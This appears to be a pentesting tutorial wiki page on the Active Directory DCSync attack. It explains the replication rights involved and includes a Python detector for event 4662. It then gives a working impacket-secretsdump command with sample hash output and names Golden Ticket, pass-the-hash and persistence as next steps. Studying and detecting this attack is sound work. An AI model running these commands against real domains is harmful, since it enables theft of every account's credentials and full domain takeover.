DCSync Attack - maxbirnbacher/ADPentesting101 GitHub Wiki

DCSync requires the following extended rights (control access rights) on the domain object itself: DS-Replication-Get-Changes (shown in the ACL editor as "Replicating Directory Changes"), DS-Replication-Get-Changes-All ("Replicating Directory Changes All") and DS-Replication-Get-Changes-In-Filtered-Set ("Replicating Directory Changes In Filtered Set"). Get-Changes together with Get-Changes-All is enough to pull password hashes; the filtered-set right is only needed for attributes in the filtered attribute set.

Important Notes about DCSync:

  • The DCSync attack impersonates a Domain Controller and asks a real Domain Controller to replicate directory data (including password hashes) using the Directory Replication Service Remote Protocol (MS-DRSR, the DRSUAPI RPC interface). Because MS-DRSR is a legitimate and necessary function of Active Directory, it cannot be turned off or disabled; the realistic control is to audit replication requests (Security event ID 4662 carrying the replication right GUIDs) made by principals that are not Domain Controllers.

  • By default only the Domain Admins, Enterprise Admins, Administrators and Domain Controllers groups hold these rights. Any other principal that has been granted them on the domain object (a directory synchronization service account such as the Azure AD Connect account is the classic example) can DCSync just the same, so the ACL of the domain object should be reviewed, not only group membership.

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync
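Since the protocol cannot be disabled, the practical defence is detection. The script below is an added example for this page (not code from the wiki or from Impacket) showing the check a SOC would run over Security event 4662 records: a replication control access right exercised against the domain object by a principal that is not a known Domain Controller. The event records and the allowlist of DC computer accounts are constructed; real 4662 events are only produced when the "Directory Service Access" audit subcategory is enabled and the domain object's SACL covers control access.

```python
#!/usr/bin/env python3
"""Flag DCSync-style replication requests in Windows Security event 4662 records.

Added example for this wiki page, not code from the wiki or from Impacket.
The events below are constructed and the DC allowlist is hypothetical.
"""
import re

# rightsGuid values of the replication extended rights in the AD schema.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}
# schemaIDGUID of the domainDNS class: DCSync requests are audited against the domain head.
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"

# Hypothetical allowlist: computer accounts of the legitimate Domain Controllers.
# A directory-sync service account that replicates legitimately would be added here too.
EXPECTED_REPLICATORS = {"DC01$", "DC02$"}

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def guids_in(field: str) -> set[str]:
    """Lower-cased GUIDs found in a 4662 'Properties' or 'ObjectType' field."""
    return {g.lower() for g in GUID_RE.findall(field)}


def is_dcsync(event: dict) -> bool:
    """True when a non-DC principal exercised a replication right on the domain object."""
    if event.get("EventID") != 4662:
        return False
    if DOMAIN_DNS_CLASS not in guids_in(event.get("ObjectType", "")):
        return False
    if not guids_in(event.get("Properties", "")) & REPLICATION_RIGHTS:
        return False
    return event.get("SubjectUserName", "") not in EXPECTED_REPLICATORS


def find_dcsync(events: list[dict]) -> list[str]:
    """Subjects that performed DCSync-like replication, in event order."""
    return [e["SubjectUserName"] for e in events if is_dcsync(e)]


# Constructed 4662 records reduced to the fields the check uses. The Properties
# text mimics the real field: '%%7688' (Control Access) followed by the GUIDs.
SAMPLE_EVENTS = [
    {   # normal DC-to-DC replication: expected
        "EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "DOMAIN",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
        "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # a user account requesting all changes from the domain head: the DCSync signature
        "EventID": 4662, "SubjectUserName": "Opaline.Herta", "SubjectDomainName": "DOMAIN",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
        "Properties": "%%7688\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # same user exercising the unrelated User-Change-Password right on a user object
        "EventID": 4662, "SubjectUserName": "Opaline.Herta", "SubjectDomainName": "DOMAIN",
        "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
        "Properties": "%%7688\n\t{ab721a53-1e2f-11d0-9819-00aa0040529b}\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}",
    },
]

if __name__ == "__main__":
    for subject in find_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}")
```

The allowlist is the weak point of this rule: any account that legitimately replicates (a new DC, a sync service account) must be added to it, otherwise it alerts; conversely an attacker who DCSyncs from a compromised DC computer account is not caught by it and needs correlation with the source host.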

Identify Target

Identify a target account by doing some reconnaissance (e.g. with BloodHound, which marks principals holding these rights with the DCSync edge) and compromise that account.

Exploitation

impacket-secretsdump

Use the option -just-dc to extract all secrets from the NTDS.DIT over DRSUAPI (NTLM hashes, Kerberos keys and, where present, cleartext passwords) without ever touching the file on disk. -just-dc-ntlm limits the dump to NTLM hashes and -just-dc-user <user> to a single account (e.g. krbtgt), which is quieter and sufficient for a Golden Ticket.

impacket-secretsdump -just-dc 'domain.local/Opaline.Herta:<password>@<dc-ip>' -outputfile dcsync_hashes
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c754b48d7d8af1e99cc89870fc90d5d0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:30963dfc22c01fefcf832a0b0d4a54e8:::
domain.local\user:1103:aad3b435b51404eeaad3b435b51404ee:92937945b518814341de3f726500d4ff:::
domain.local\enduser:1105:aad3b435b51404eeaad3b435b51404ee:92937945b518814341de3f726500d4ff:::
domain.local\lu.rosanne:1107:aad3b435b51404eeaad3b435b51404ee:9726c2b6c11ed6186b6733c5558a4438:::
domain.local\gussi.annemarie:1108:aad3b435b51404eeaad3b435b51404ee:3d79ce0a6062be42e3202ad39988e48a:::
domain.local\murial.maxine:1109:aad3b435b51404eeaad3b435b51404ee:7166f21d35d02ef32ec60cb602339a56:::
domain.local\martica.liliane:1110:aad3b435b51404eeaad3b435b51404ee:1a57094cf70f74ea468f64b8429c0525:::
domain.local\cornelia.darice:1111:aad3b435b51404eeaad3b435b51404ee:fa0c75733a14990cc00cb8fdc0bc8270:::
domain.local\haley.debra:1112:aad3b435b51404eeaad3b435b51404ee:830b9f5a45fd2490ca3a529c9859d28b:::
...
[*] Cleaning up... 

-just-dc with -outputfile writes 3 files:

  • dcsync_hashes.ntds with the NTLM hashes (domain\uid:rid:lmhash:nthash:::)
  • dcsync_hashes.ntds.kerberos with the Kerberos keys (AES and DES) of every account
  • dcsync_hashes.ntds.cleartext with cleartext passwords from the NTDS for any account that has "Store password using reversible encryption" enabled

The next step would be to forge a TGT (a Golden Ticket, using the krbtgt key from the dump) or to pass the hash with the Administrator NT hash, and then create a user with domain administrator rights for persistence.